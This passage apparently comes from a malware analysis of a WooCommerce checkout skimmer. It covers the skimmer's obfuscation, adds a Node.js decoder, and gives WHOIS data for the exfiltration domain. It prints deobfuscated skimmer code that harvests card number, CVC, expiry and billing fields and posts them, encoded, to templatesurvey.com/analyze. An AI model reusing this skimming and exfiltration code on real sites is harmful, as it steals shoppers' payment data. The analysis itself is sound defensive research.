  // _0x46E8 = "billing_expdatemonth";
  if (_0x497C == true) {
    _0x497C();
    _0x497C = true;
    return;
  } else {
    _0x4709 = "62$69$6c$6c$69$6e$67$5f$65$78$70$64$61$74$65$79$65$61$72";
    // _0x4709 = "billing_expdateyear";
  }
  _0x472A = "";
  _0x48D7 =
    "69$6e$70$75$74$23$70$61$79$6d$65$6e$74$5f$6d$65$74$68$6f$64$5f$70$61$79$70$61$6c$70$72$6f";
  // "input#payment_method_paypalpro";
  _0x4A21();
})();
Skimmer Deetz⌗
Functionality⌗
The skimmer operates by capturing the POST data sent from the victim on the /checkout URL of the infected WooCommerce website. If the URL does not contain both the expected domain name (_0x4895) and /checkout (_0x4643), the skimmer won’t operate:
function _0x4A21() {
  if (
    window.location.href.indexOf(_0x4895.wtf()) !== -1 &&
    window.location.href.indexOf(_0x4643.wtf()) !== -1
  ) {
    _0x4A00(_0x49DF);
  } else {
    _0x499D(_0x47AE, "js");
  }
}
The skimmer also performs some validation checks when capturing data from the targeted form fields: only non-empty fields whose names contain shipping_, billing_ or paypalpro are collected, and the card number, CVC and expiry fields are renamed before exfiltration:
function _0x4C10(_0x4D9C) {
  _0x49BE("In collectData", 1);
  jQuery.each(_0x4D9C.serializeArray(), function () {
    if (
      (this.name.indexOf("shipping_") !== -1 ||
        this.name.indexOf("billing_") !== -1 ||
        this.name.indexOf(_0x47CF.wtf()) !== -1) &&
      this.value != ""
    ) {
      _0x4C31[this.name] = this.value;
    }
  });
  jQuery.each(
    _0x4D9C.find('input[id*="' + _0x47CF.wtf() + '"]:visible'),
    function () {
      _0x4C31[jQuery(this).attr("id")] = this.value;
    }
  );
  _0x4CB5(_0x4C31, _0x46A6.wtf(), _0x47CF.wtf() + "-card-number");
  _0x4CB5(_0x4C31, _0x46C7.wtf(), _0x47CF.wtf() + "-card-cvc");
  _0x4CB5(_0x4C31, _0x46E8.wtf(), _0x47CF.wtf() + "-card-expiry");
  if (_0x4709 && _0x4C31[_0x4709.wtf()]) {
    _0x4C31[_0x47CF.wtf() + "-card-expiry"] =
      _0x4C31[_0x47CF.wtf() + "-card-expiry"] +
      " / " +
      _0x4C31[_0x4709.wtf()];
    delete _0x4C31[_0x4709.wtf()];
  }
  if (_0x472A) {
    _0x4CB5(_0x4C31, _0x472A.wtf(), _0x47CF.wtf() + "_cc_owner");
  }
}
Obfuscation⌗
- Values assigned to an array within the main variable _0x495B
- Hex encoded string values within the array: \x77\x74\x66 -> wtf
- A second layer of hex encoding for the most sensitive strings, with a $ character inserted between the hex pairs; these are decoded at runtime by the wtf() method the skimmer adds to String.prototype:
\x32\x66\x24\x36\x33\x24\x36\x38\x24\x36\x35\x24\x36\x33\x24\x36\x62\x24\x36\x66\x24\x37\x35\x24\x37\x34
⬇️⬇️
2f$63$68$65$63$6b$6f$75$74
⬇️⬇️
2f 63 68 65 63 6b 6f 75 74
⬇️⬇️
/checkout
Exfiltration: templatesurvey.com⌗
Upon a victim submitting their payment data (in a POST request), the skimmer encodes the skimmed data with rot13, then rot5, then base64, before it is exfiltrated via a separate POST request to the malicious URL templatesurvey.com/analyze:
jQuery
  .ajax({
    type: "POST",
    url: _0x4874.wtf(),
    data: _0x4BEF(JSON.stringify(_0x4C31).rot13().rot5()),
    timeout: 20000,
    contentType: "text/plain",
  })
ROT5 is similar to ROT13 except that it applies to numeric digits (0 to 9). ROT13 and ROT5 can be used together in the same message, sometimes called ROT18 (18 = 13 + 5) or ROT13.5.
Here’s a sample of the encoded data sent in the exfiltration POST request to templatesurvey.com:
Decode: base64 -> rot13 -> rot5 -> plaintext
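As an added example (not code from the original post or from the skimmer itself), here is a small Node.js helper covering both the Obfuscation and Exfiltration sections above: it reverses the $-separated hex strings that String.prototype.wtf decodes, and it unwraps the rot13 -> rot5 -> base64 layering applied to the exfiltrated JSON. The sample payload is constructed here for the round trip, not captured traffic.

```javascript
// Added analysis helper: reverses the 0x4895.wtf skimmer's string and
// payload encodings so an analyst can read its config strings and any
// exfil body captured from a proxy or web server log. Node.js, no deps.

// "$"-separated hex, the same transform as the skimmer's String.prototype.wtf,
// e.g. "2f$63$68$65$63$6b$6f$75$74" -> "/checkout".
function unwtf(s) {
  return s
    .split("$")
    .map(function (h) { return String.fromCharCode(parseInt(h, 16)); })
    .join("");
}

// Standard ROT13 on ASCII letters; it is its own inverse.
function rot13(s) {
  return s.replace(/[a-zA-Z]/g, function (c) {
    var base = c <= "Z" ? 65 : 97;
    return String.fromCharCode(((c.charCodeAt(0) - base + 13) % 26) + base);
  });
}

// ROT5 on ASCII digits: 0-4 shift up by 5, 5-9 shift down; also self-inverse.
function rot5(s) {
  return s.replace(/[0-9]/g, function (d) {
    return String.fromCharCode(((d.charCodeAt(0) - 48 + 5) % 10) + 48);
  });
}

// The skimmer sends base64(rot5(rot13(JSON))). Its btoa/encodeURIComponent
// wrapper is just UTF-8 then base64, which Buffer reproduces directly.
function encodeExfil(obj) {
  var body = rot5(rot13(JSON.stringify(obj)));
  return Buffer.from(body, "utf8").toString("base64");
}

// Undo the layers in reverse: base64 first, then rot5, then rot13.
// rot13 and rot5 touch disjoint characters, so their relative order is
// irrelevant; only base64 has to be stripped first.
function decodeExfil(b64) {
  var body = Buffer.from(b64, "base64").toString("utf8");
  return rot13(rot5(body));
}

// Decode the skimmer's configuration strings quoted in the post.
function decodeConfig() {
  return {
    gate: unwtf("2f$63$68$65$63$6b$6f$75$74"), // URL must contain this
    form: unwtf("66$6f$72$6d$5b$6e$61$6d$65$3d$27$63$68$65$63$6b$6f$75$74$27$5d"),
    gateway: unwtf("70$61$79$70$61$6c$70$72$6f"),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  // Constructed sample payload (not captured traffic) round-tripped through
  // the skimmer's encoding and back; the expiry exercises the digit layer.
  var sample = { mer: "paypalpro", type: "wp_woo", "paypalpro-card-expiry": "12 / 25" };
  var wire = encodeExfil(sample);
  console.log(wire);
  console.log(decodeExfil(wire));
  console.log(decodeConfig());
}
```

Feed any base64 body from a POST to /analyze into decodeExfil to recover the plaintext JSON the skimmer built.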
Domain Name: TEMPLATESURVEY.COM
Registry Domain ID: 2569768401_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.internet.bs
Registrar URL: http://www.internet.bs
Updated Date: 2020-11-02T12:49:21Z
Creation Date: 2020-11-02T12:49:20Z
Registry Expiry Date: 2021-11-02T12:49:20Z